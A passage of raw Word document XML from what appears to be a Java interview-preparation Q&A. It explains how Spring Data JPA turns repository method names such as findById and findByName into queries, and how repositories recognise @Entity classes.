      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, that offer new ways of designing and deploying servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7968CD" w14:textId="77777777" w:rsidR="002C4D65" w:rsidRPr="002C6305" w:rsidRDefault="002C4D6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Novel Server in Gaming</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In the context of gaming or online multiplayer games, a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>novel-based server</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> could potentially refer to a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in games that are inspired by or based on a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>novel's narrative</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or world-building. Some games or virtual worlds are directly inspired by novels, and a server used in such games could be described as "novel-based."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB669AC" w14:textId="77777777" w:rsidR="002C4D65" w:rsidRPr="002C6305" w:rsidRDefault="002C4D6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Typo or Miscommunication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It's also possible that you meant a different term like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"novelty server"</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new server technology"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where "novel" might simply mean "new" or "innovative." In this case, it would be referring to servers that use new or unconventional technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700C639" w14:textId="77777777" w:rsidR="002C4D65" w:rsidRPr="002C6305" w:rsidRDefault="002C4D65"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f you're asking about a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific type of server technology</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>framework</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architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> related to the word "novel," could you provide more context or clarify the term? I'd be happy to give you a more targeted answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419C790" w14:textId="43F4B267" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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1ADCF40">
          <v:rect id="_x0000_i2737" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="035ED18E" w14:textId="101AAB79" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF445E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="660" w:name="_Toc196308140"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will the findById or findByName method in the repository work with name? When we go with camelcase then where is it implemented internally</w:t>
      </w:r>
      <w:r w:rsidR="009653FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="660"/>
    </w:p>
    <w:p w14:paraId="4DD733BE" w14:textId="6F261D5D" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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 Spring Data JPA, the methods findById, findByName, and similar methods are used to query the database based on the entity's properties. The magic behind these methods is that </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses method naming conventions to generate the query automatically. Here's a detailed breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E8DF42" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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findById():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C9BBA6"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findById is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standard method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by Spring Data JPA's JpaRepository interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01308C86"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t is used to find an entity by its primary key (ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8BB384"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ternally, Spring Data JPA translates this method name into a query like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072A9B2"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LECT * FROM entity WHERE id = ?;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4CF55"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The ID column is typically the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the entity, and the findById method automatically knows to map the id field of the entity to the column in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2B629"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F432B44"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Optional&lt;Employee&gt; employee = employeeRepository.findById(1L);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDFD0F3" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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findByName():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B600737"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Similarly, findByName is another query method where </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> translates it into a query that retrieves records by the name field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01BC72"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ternally, Spring Data JPA converts the method name into a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL (Java Persistence Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> query or an SQL query, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A737CF"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LECT * FROM employee WHERE name = ?;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114C43C"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t assumes the name field exists in the entity and is mapped to the corresponding column in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B908F0"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5998C28B"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ist&lt;Employee&gt; employees = employeeRepository.findByName("John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C22CA" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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CamelCase in Method Names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F867C"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 Spring Data JPA, when you use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>camelCase</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in method names like findByEmployeeName, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> understands it as a query method that translates into SELECT * FROM employee WHERE employee_name = ?.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E571A7D"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nternally, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses reflection to process the method names and dynamically generate queries at runtime based on method names, leveraging the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data Query Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA00646" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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Internal Implementation of CamelCase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D959A"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hen you define a method like findByEmployeeName, Spring Data JPA follows this convention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46011D8C" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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findBy"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Indicates that it's a query method (not an update/delete operation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D74D37" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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mployeeName"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The field employeeName will be mapped to a corresponding database column, which should be employee_name in snake_case, depending on your entity's column name mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA0A26"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This is handled internally in the Spring Data JPA </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>QueryMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class, which is responsible for interpreting the method names and generating the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL</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SQL queries</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D244579" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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4. Custom Queries (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6389FB7C"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f the default query generation doesn't meet your requirements or if you need a more complex query, you can also use the @Query annotation to write custom queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F81BDA8"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 of using @Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55A84D"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Query("SELECT e FROM Employee e WHERE e.name = :name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44267CBF"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ist&lt;Employee&gt; findByName(@Param("name") String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C7F16" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF41E5A"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findById</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works based on the entity's ID field and primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D0E61"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findByName</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works by mapping the method name (findByName) to a query that looks for a column called name in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D751A"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amelCase</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is interpreted by Spring Data JPA to map the method names to corresponding database column names (e.g., findByEmployeeName is mapped to the column employee_name in snake_case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34626CCB"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ternally, Spring Data JPA uses reflection and its query creation mechanism to build the query dynamically at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076F2C49" w14:textId="0CA45B50" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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861D7E5">
          <v:rect id="_x0000_i2738" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="149114B2" w14:textId="47D02183" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF445E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="661" w:name="_Toc196308141"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does the JPA Repository know there is a class</w:t>
      </w:r>
      <w:r w:rsidR="009653FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="661"/>
    </w:p>
    <w:p w14:paraId="44431F1C" w14:textId="0C0EACD8" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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Spring Data JPA, the JPA Repository knows about a class (entity) through the following process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0D4C63" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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Entity Class Annotation (@Entity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F385C4A"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To make a class known to Spring Data JPA, it must be annotated with the @Entity annotation. This tells Spring that the class should be treated as a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA entity</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning it represents a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7039530E"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6234278F"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE9350"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C608ED"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36515406"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neratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911418B"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C69C1"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541FF69"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF02102"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String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F169A"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7B82F9B8"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Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2F7B6"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ED5E24C"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The @Entity annotation marks the class as an entity, and the corresponding table name is usually derived from the class name (in this case, employee), unless specified otherwise using the @Table annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E576E01" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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JPA Repository Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B23E186"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o interact with the entity, you create a repository interface that extends JpaRepository or one of its superinterfaces, such as CrudRepository or PagingAndSortingRepository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F9E42"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02B715E2"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF32A7"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Custom query methods can be defined here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7094F"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38D07F8"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JpaRepository is a Spring Data interface that provides basic CRUD operations, along with methods like findById, save, deleteById, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3477A0FE"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Generic Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67F953" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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first parameter of JpaRepository is the entity type (Employee in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4E92C" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8E"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second parameter is the type of the entity's primary key (Long in this case, as the Employee class has a Long type id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62023F48" w14:textId="77777777" w:rsidR="00FE7F8E" w:rsidRPr="002C6305" w:rsidRDefault="00FE7F8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Component Scanning:</w:t>
      </w:r>
    </w:p>
